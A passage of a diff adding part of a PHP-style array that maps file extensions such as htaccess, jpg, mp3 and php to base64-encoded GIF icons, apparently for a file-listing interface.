+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAevgAKCg4MBRoeIAhkFjI0CIYaIRgIMPjSNBRQUKJGHAj0MDEEFCAgJ".
+"CTELnYoMOUA/GggDAzIHqwU8OzcgQrMDCbaJBQY4OikjFgQEwKulBBUKEScWp8GesbIGHxE1RTbW".
+"Ri4zsrPPKxsO4B4YvsoGFyroQ4gd7APKBAbvDyUTEIcSONxzp6/BgQck/BkJiE+fgQYGWwQwQcSI".
+"CAUYFbBYwHEBjBcBQh4KSbIkSUSBAAA7",
+"ext_h"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB".
+"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo".
+"Wq/NknbbSgAAOw==",
+"ext_hpp"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF".
+"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR".
+"UqUagnbLdZa+YFcCADs=",
+"ext_ht"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAgwAAAICAgMDAwP8AAP///wAA/wAAgAD//wAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARMEEk0pr2VynxnHQEYjGM3nESqCsB2fkAss9gJHEVu0B4S".
+"EICcjqfxAYWFXevyAxieT+IkIKhaq0sLaUtiqr6qrPFKFgdkaHRnzW5PIgA7",
+"ext_hta"=>
+"R0lGODlhEAAQABEAACH5BAEAAAMALAAAAAAQABAAgf///wAAAACAAAAAAAI63IKpxgcPH2ouwgBC".
+"w1HIxHCQ4F3hSJKmwZXqWrmWxj7lKJ2dndcon9EBUq+gz3brVXAR2tICU0gXBQA7",
+"ext_htaccess"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6".
+"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ".
+"AAA7",
+"ext_htm"=>
+"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz".
+"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P".
+"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk".
+"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR".
+"ADs=",
+"ext_html"=>
+"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz".
+"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P".
+"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk".
+"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR".
+"ADs=",
+"ext_img"=>
+"R0lGODlhEwAQALMAAAAAAP///6CgpHFzcVe2Osz/mbPmZkRmAPj4+Nra2szMzLKyspeXl4aGhlVV".
+"Vf///yH5BAEAAA8ALAAAAAATABAAAASA8KFJq00vozZ6Z4uSjGOTSV3DMFzTCGJ5boIQKsrqgoqp".
+"qbabYsFq+SSs1WLJFLgGx82OUWMuXVEPdGcLOmcehziVtEXFjoHiQGCnV99fR4EgFA6DBVQ3c3bq".
+"BIEBAXtRSwIsCwYGgwEJAywzOCGHOliRGjiam5M4RwlYoaJPGREAOw==",
+"ext_inf"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL".
+"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM".
+"SnEjgPVarHEHgrB43JvszsQEADs=",
+"ext_ini"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL".
+"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM".
+"SnEjgPVarHEHgrB43JvszsQEADs=",
+"ext_isp"=>
+"R0lGODlhEAAQADMAACH5BAEAAAwALAAAAAAQABAAgwAAAICAAP8A/wCAgAD/////AP///8DAwICA".
+"gIAAgACAAAD/AAAAAAAAAAAAAAAAAARakMl5xjghzC0HEcIAFBrHeALxiSQ3LIJhEIkwltOQxiEC".
+"YC6EKpUQBQCc1Oej8B05R4XqYMsgN4ECwGJ8mrJHgNU0yViv5DI6LTGvv1lSmBwwyM1eDmDP328i".
+"ADs=",
+"ext_ist"=>
+"R0lGODlhEAAQAEQAACH5BAEAABIALAAAAAAQABAAhAAzmQBmzAAAAABmmQCZzACZ/wAzzGaZzDOZ".
+"/5n//wBm/2bM/zPM/zOZzMz//zNmzJnM/zNmmQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAV1oASMZDlKqDisQRscQYIAKRAFw3scTSPPKMDh4cI9dqRgi0BY4gINoIhQ".
+"QBQUhSZOSBMxIIkEo5BlrrqAhWO9KLgIg5NokYCMiwGDHICwKt5NemhkeEV7ZE1MLQYtcUF/RQaS".
+"AGdKLox5I5Uil5iUZ2gmoichADs=",
+"ext_jfif"=>
+"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
+"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
+"FxEAOw==",
+"ext_jpe"=>
+"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
+"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
+"FxEAOw==",
+"ext_jpeg"=>
+"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
+"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
+"FxEAOw==",
+"ext_jpg"=>
+"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
+"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
+"FxEAOw==",
+"ext_js"=>
+"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH".
+"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs".
+"a00AjYYBbc/o9HjNniUAADs=",
+"ext_lnk"=>
+"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO".
+"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi".
+"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk".
+"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG".
+"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5".
+"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf".
+"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ".
+"ADs=",
+"ext_log"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN".
+"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==",
+"ext_m1v"=>
+"R0lGODlhEAAQADMAACH5BAEAAAwALAAAAAAQABAAgwAAAICAgMDAwP///4AAAICAAACAAP//AP8A".
+"AAAA/wCAgAD//wAAAAAAAAAAAAAAAARlkEkZapiY2iDEzUwwjMmSjN8kCoAXKEmXhsLADUJSFDYW".
+"AKOa7bDzqG42UYFopHRqLMHOUDmungbDQTH74ToDQ0Fr8Ak5guy4QPCNWizCATFvq2xxBB1h91UJ".
+"BHx9IBOAg4SIDBEAOw==",
+"ext_m3u"=>
+"R0lGODlhEAAQAEQAACH5BAEAABUALAAAAAAQABAAhAAAAPLy8v+qAHNKAD4+Prl6ADIyMubm5v+4".
+"SLa2tm5ubsDAwJ6ennp6ev/Ga1AyAP+Pa/+qJWJiYoCAgHMlAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAVzYCWOlQSQAEWORMCcABENa9UG7lNExUnegcQAIeitgIoC0fjDNQYCokBh".
+"8NmCUIdDKhi8roGGYMztugCARXgwcIzHg0TgYKikg9yCAkcfASZccXx1fhBjejhzhCIAhlNygytQ".
+"PXeKNQMPPml9NVaMBDUVIQA7",
+"ext_mdb"=>
+"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".
+"/////ywAAAAAEAAQAAAEV/BIRKuV+KDHO0eAFBRjSRbfE6JeFxwqIAcdQm4FzB0A+5AP2qvDo3FM".
+"P92DxzJtXpIlQHjr5KLMX2Dj2kmNrZ+XaSqPQ5NdBovWhD08DGJNb4Nk+LwsAgA7",
+"ext_mid"=>
+"R0lGODlhEAAQACIAACH5BAEAAAQALAAAAAAQABAAggAAAP///4CAgMDAwAAAAAAAAAAAAAAAAANE".
+"SCTcrnCFSecQUVY6AoYCBQDiCIDlyJ1KOJGqxWoBWa/oq8t5bAeDWci0Awprtpgx91IGmcjKs7XZ".
+"TBeDrHZ7NXm/pwQAOw==",
+"ext_midi"=>
+"R0lGODlhEAAQACIAACH5BAEAAAQALAAAAAAQABAAggAAAP///4CAgMDAwAAAAAAAAAAAAAAAAANE".
+"SCTcrnCFSecQUVY6AoYCBQDiCIDlyJ1KOJGqxWoBWa/oq8t5bAeDWci0Awprtpgx91IGmcjKs7XZ".
+"TBeDrHZ7NXm/pwQAOw==",
+"ext_mov"=>
+"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".
+"/////ywAAAAAEAAQAAAEU/DIg6q1M6PH+6OZtHnc8SDhSAIsoJHeAQiTCsuCoOR8zlU4lmIIGApm".
+"CBdL1hruirLoQec0so5SQYKomAEeSxezRe5IRTCzGJ3+rEGhzJtMb0UAADs=",
+"ext_mp3"=>
+"R0lGODdhEAAQAPcAAAAAACMjIyAgIEpKSgQNGxIWHzMzM////0dISQIMHCwoHNqbMHNMAPj9/1RP".
+"YZdfAP/NVP+5ADEqH1xpgjcZAP+6D//Mb/+vAB0YDgYLEzg4OJGcrzMUAOOWAP+9AP/AVf+qADs5".
+"N0pOVh4eHhUVGLJyAP/AA/+vDP+1HP+0AOihABUMAGJqevWqEf/BMv+zLP/cqv+1APWPAPePAKha".
+"ALjAy2NsfvqkAP+xAP/QefWsAPRtAP+eAP/OAE0YANTY4Tk5OQAABNC3e/qQAPZuAP/IAOeaAAwG".
+"AL7F0QAADt61Xv9xAP+gAP/FAGU2AElXdAseMemaXfeJAP/KANeGAAkJCdXc6R0mMNePS/++AEUo".
+"AImXrQgVLP/YALh9ACQmKxUcJkJCQiMmLGVJERgjOBMTEwsOFQAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAAEAAQAAAIuwCRCByI".
+"JEAAgggJChgwQIBAAgUSIhFg4MABBAkULGCQkKLFBg4eQIggAaHHAxMoVLBwAYNJDQc2cOjg4QOI".
+"ECJGDBQAk0QJEydQpFCx4oAGhwEGHGDRwsULGDFkzKBR48AAg0pt3MCRQ8cOHj18/LB6UACQA0GE".
+"DCFSxMgRJAcMOBQoIImSJUyaOHliUS5BKFGkTKFSxUrfuQKvYImQRcsWi3ERC+TSxcsXMGEOJxQz".
+"hgxdhpIlCjQoMSAAOw==",
+"ext_mp4"=>
+"R0lGODdhEAAQAPcAAAAAACMjIyAgIEpKSgQNGxIWHzMzM////0dISQIMHCwoHNqbMHNMAPj9/1RP".
+"YZdfAP/NVP+5ADEqH1xpgjcZAP+6D//Mb/+vAB0YDgYLEzg4OJGcrzMUAOOWAP+9AP/AVf+qADs5".
+"N0pOVh4eHhUVGLJyAP/AA/+vDP+1HP+0AOihABUMAGJqevWqEf/BMv+zLP/cqv+1APWPAPePAKha".
+"ALjAy2NsfvqkAP+xAP/QefWsAPRtAP+eAP/OAE0YANTY4Tk5OQAABNC3e/qQAPZuAP/IAOeaAAwG".
+"AL7F0QAADt61Xv9xAP+gAP/FAGU2AElXdAseMemaXfeJAP/KANeGAAkJCdXc6R0mMNePS/++AEUo".
+"AImXrQgVLP/YALh9ACQmKxUcJkJCQiMmLGVJERgjOBMTEwsOFQAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAAEAAQAAAIuwCRCByI".
+"JEAAgggJChgwQIBAAgUSIhFg4MABBAkULGCQkKLFBg4eQIggAaHHAxMoVLBwAYNJDQc2cOjg4QOI".
+"ECJGDBQAk0QJEydQpFCx4oAGhwEGHGDRwsULGDFkzKBR48AAg0pt3MCRQ8cOHj18/LB6UACQA0GE".
+"DCFSxMgRJAcMOBQoIImSJUyaOHliUS5BKFGkTKFSxUrfuQKvYImQRcsWi3ERC+TSxcsXMGEOJxQz".
+"hgxdhpIlCjQoMSAAOw==",
+"ext_mpe"=>
+"R0lGODlhEAAQADMAACH5BAEAAAsALAAAAAAQABAAgwAAAP///4CAgMDAwACAgICAAACAAP8AAP//".
+"AIAAAAD//wAAAAAAAAAAAAAAAAAAAARqcMlBKxUyz8B7EJi2DF4nfCIJgiTgAtl6BoNAUvBik0RP".
+"2zTYSQDgKQif00Co4ggKhRMgqKM4AwWE1MacTaFRAFdCpHEMBARBvCQ7SYY4cewmDtCFg4uo2REP".
+"Bwh6fBovAAkHCYYihS4iEQA7",
+"ext_mpeg"=>
+"R0lGODlhEAAQADMAACH5BAEAAAsALAAAAAAQABAAgwAAAP///4CAgMDAwACAgICAAACAAP8AAP//".
+"AIAAAAD//wAAAAAAAAAAAAAAAAAAAARqcMlBKxUyz8B7EJi2DF4nfCIJgiTgAtl6BoNAUvBik0RP".
+"2zTYSQDgKQif00Co4ggKhRMgqKM4AwWE1MacTaFRAFdCpHEMBARBvCQ7SYY4cewmDtCFg4uo2REP".
+"Bwh6fBovAAkHCYYihS4iEQA7",
+"ext_mpg"=>
+"R0lGODlhEAAQADMAACH5BAEAAAsALAAAAAAQABAAgwAAAP///4CAgMDAwACAgICAAACAAP8AAP//".
+"AIAAAAD//wAAAAAAAAAAAAAAAAAAAARqcMlBKxUyz8B7EJi2DF4nfCIJgiTgAtl6BoNAUvBik0RP".
+"2zTYSQDgKQif00Co4ggKhRMgqKM4AwWE1MacTaFRAFdCpHEMBARBvCQ7SYY4cewmDtCFg4uo2REP".
+"Bwh6fBovAAkHCYYihS4iEQA7",
+"ext_nfo"=>
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs".
+"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv".
+"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3".
+"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr".
+"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX".
+"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA".
+"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW".
+"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK".
+"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm".
+"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg".
+"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF".
+"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA".
+"Ow==",
+"ext_ocx"=>
+"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAIAAAP8AAP//AAAA/wD/AACAAAAAgICA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARKMMlJq704620AQlMQAABlFMAwlIEgEESZnKg6tEJwwOVZ".
+"IjfXKLHryRK4oaRDJByQwlQP1SQkUypAgdpsDYErruRAOpaPm7Q6HQEAOw==",
+"ext_pcx"=>
+"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwP///4CAgIAAAICAAP//AP8AAAAA".
+"gAAA/wAAAAAAAAAAAAAAAAAAAAAAAARgUKlBqx0yDyEACBxHZRMXDGC4YQOwCVQKdJ7bggcBtl8Q".
+"AJNfIBcoGD4CH1CBSAByxp5pOUAgCFFf6HexIKeore+2BaJ8p1sqaU6NpdOgiQJny5On+u+e7qH3".
+"EzWCgwARADs=",
+"ext_php"=>
+"R0lGODlhEAAQAJECADZOogAAAAAAAAAAACH5BAEAAAIALAAAAAAQABAAAAIolI+pywIPG1CzWReD".
+"0bB6oYGO4WXBiT0kEnJJtcXwJc2kvb51R/d0AQA7",
+"ext_pif"=>
+"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".
+"/////ywAAAAAEAAQAAAEO/DISasEOGuNDkJMeDDjGH7HpmYd9jwazKUybG+tvOlA7gK1mYv3w7RW".
+"mJRRiRQ2Z5+odNqxWK/YrDUCADs=",
+"ext_pl"=>
+"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo".
+"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7",
+"ext_png"=>
+"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwP///4CAgIAAAICAAP//AP8AAAAA".
+"gAAA/wAAAAAAAAAAAAAAAAAAAAAAAARgUKlBqx0yDyEACBxHZRMXDGC4YQOwCVQKdJ7bggcBtl8Q".
+"AJNfIBcoGD4CH1CBSAByxp5pOUAgCFFf6HexIKeore+2BaJ8p1sqaU6NpdOgiQJny5On+u+e7qH3".
+"EzWCgwARADs=",
+"ext_reg"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgACAgMDAwAD//wAAAAAAAANM".
+"aCrcrtCIQCslIkprScjQxFFACYQO053SMASFC6xSEQCvvAr2gMuzCgEwiZlwwQtRlkPuej2nkAh7".
+"GZPK43E0DI1oC4J4TO4qtOhSAgA7",
+"ext_rev"=>
+"R0lGODlhEAAQAFUAACH5BAEAAD8ALAAAAAAQABAAhQAAAOvz+////1gdAFAAANDY4IYCU/9aZJIC".
+"Wtvi7PmyheLq8xE2AAAyUNTc5DIyMr7H09jf5/L5/+Dg8PX6/4SHl/D4/5OXpKGmse/2/ZicqPb6".
+"/28aIBlOAMHI0MzU3MXFHjJQAOfu9d7k7gA4Xv//sRVDAI0GUY0CU+Hn8ABbjfFwOABMfwhfL/99".
+"0v+H1+hatf9syvRjwP+V3gA4boCAAABQhf+j5f++8P950FBQAN/n8PD2/HNzAABilgAAAAaRwIFw".
+"SCz+MJpLhdMzOJ9PAqRQmJxKuNvs5crFZDBCwSIQcECItDqNIlAkGcejRqjb74C8fs8/JiskLD4e".
+"BRERCSMpIg1TVTYqAZGRPBsCCw1jZTSVZZ0CAZdvcQ+SBwqfn5d8pacBqX5KJgEHtAcrrTsMjRM6".
+"rKgLBQyZAiG+rh8tDKJyCc3OEQUdHQx81Xs/QQA7",
+"ext_rmi"=>
+"R0lGODlhFAAUAKL/AAAAAH8Af//4/8DAwL+/v39/fwAAAAAAACH5BAEAAAMALAAAAAAUABQAQANS".
+"OLrcvkXIMKUg4BXCu8eaJV5C8QxRQAmqBTpFLM+nEk3qemUwXkmvxs3n4tWOyCRk5DKdhi0JYGpk".
+"QFm6oNWyylaXud8uxI2Oe8zig8puf5WNBAA7",
+"ext_rtf"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
+"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
+"ext_shtm"=>
+"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAIdjI+pq+DAEIzpTXputLi9rmGc".
+"ETbgR3aZmrIlVgAAOw==",
+"ext_shtml"=>
+"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAIdjI+pq+DAEIzpTXputLi9rmGc".
+"ETbgR3aZmrIlVgAAOw==",
+"ext_so"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6".
+"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ".
+"AAA7",
+"ext_stl"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAgwAAAP///wCAAMDAwAAAgP//AICAgICAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARYEIlJK0VYmDE294YAZEMQFCZ6DiJpBsNRmuwoDephHGqd".
+"GanYLBCyCYavYOsWIDQJUKePeXr1lprmM1ooklRJGrbkjEJhY7B6qvlwOh+sZb5EAO74PB4RAQA7",
+"ext_swf"=>
+"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O".
+"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
+"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA".
+"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC".
+"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=",
+"ext_sys"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAgv///wAAAICAgMDAwICAAP//AAAAAAAAAANJ".
